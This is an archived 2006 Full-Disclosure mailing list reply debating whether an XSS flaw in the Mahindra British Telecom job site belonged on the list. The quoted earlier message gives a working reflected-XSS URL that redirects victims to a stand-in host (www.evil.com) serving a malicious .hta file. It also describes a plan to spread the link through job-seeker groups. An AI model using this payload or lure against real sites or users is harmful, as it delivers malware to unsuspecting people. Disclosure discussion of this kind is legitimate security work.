[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: [Full-disclosure] MBT Xss vulnerability

To: MuNNa <sant.jadhav@xxxxxxxxx>
Subject: Re: [Full-disclosure] MBT Xss vulnerability
From: "Native.Code" <native.code@xxxxxxxxx>
Date: Sun, 22 Jan 2006 23:56:32 +0800

Nice discussion guys. Perhaps I should have mentioned that XSS about every
site should not be posted to FD. And MBT does *not* attract millions of
job-seekers. It is an Indian employer and IT job-seekers in India, at any
given time, should not be more than one million.

I believe most of subscribers on this list did not have to know this XSS. It
should have been better reported to IT team at MBT.

Best.


On 1/21/06, MuNNa <sant.jadhav@xxxxxxxxx> wrote:
>
> Hii Bro,
>
> I got the point.You meant to say that Xss for each and every site should
> not be posted here, unless n until it attracts heavy traffic like Yahoo etc.
> I agree to this that MBT doesnt attract that amount of traffic normally  but
> you can target millions of users at one go.
> Like say...there are many groups that post new job vacancies everyday. So
> if i create a url with javascript allowing you to download a file with say
> .hta  extension and  it claims itself to be some form that has to be filled
> by victim in order to apply for job.
> For eg. http://www.mahindrabt.com/jse/jsp/search.jsp?q=<script>
> document.location='www.evil.com/applicationform.hta'</script>
>
> If you post this URL in any of the above groups, you can be sure that your
> file will be downloaded  by thousands of users. This is because MBT is one
> of the top employers. Believe me.
>
> Before some one downloads such files and gets his machine compromised, i
> just wanted to warn the users. As number of victims could be large enough to
> create havoc, MBT's Xss vuln was of great concern to me.This is what made
> me post this vuln over here. May be i might have posted it in the wrong
> list. If this is the case, i am sory to cause annoyance to you and others.
>
> Regards;
> Santosh J.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

References:
- [Full-disclosure] MBT Xss vulnerability
  - From: MuNNa
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: Native.Code
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: greybrimstone
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: MuNNa
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: Stan Bubrouski
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: MuNNa
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: Stan Bubrouski
- Re: [Full-disclosure] MBT Xss vulnerability
  - From: MuNNa

Prev by Date: [Full-disclosure] [ GLSA 200601-11 ] KDE kjs: URI heap overflow vulnerability
Next by Date: [Full-disclosure] private imap4d exploit
Previous by thread: Re: [Full-disclosure] MBT Xss vulnerability
Next by thread: Re: [Full-disclosure] MBT Xss vulnerability
Index(es):
- Date
- Thread